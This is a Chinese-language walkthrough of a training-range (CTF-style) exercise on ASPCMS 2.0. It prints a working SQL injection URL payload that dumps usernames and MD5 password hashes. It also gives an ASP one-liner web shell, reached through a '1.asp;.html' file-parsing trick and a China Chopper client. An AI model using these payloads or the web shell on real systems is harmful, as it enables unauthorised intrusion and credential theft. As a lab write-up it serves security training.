靶场：

https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe

背景介绍

ASPCMS是完全开源的一套CMS建站系统，主要面向企业进行快速的建造简洁，高效，易用，安全的公司企业网站，一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异的公司企业网站。ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。

实训目标

1.学习登录绕过、cookie欺骗的相关知识;
2.熟悉火狐插件cookies Manager使用；
3.对代码的相关知识了解；

解题方向

代码审计漏洞，cookie伪造绕过身份鉴别

解题思路：

1、打开网址，查看页面源码，发现目标使用aspcms2.0

2、百度aspcms2.0，发现存在注入漏洞，利用payload

/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

获取用户名和密码（密码是MD5加密后的）

解密：4rfv3edc2wsx1qaz

3、使用用户名密码登录

4、发现一个界面风格位置，有一个1.asp;.html文本信息，而里面也已经写好了asp一句话木马

<%eval request("chopper")%>

5、菜刀连接，在C盘下找到key

/Templates/green/html/1.asp;.html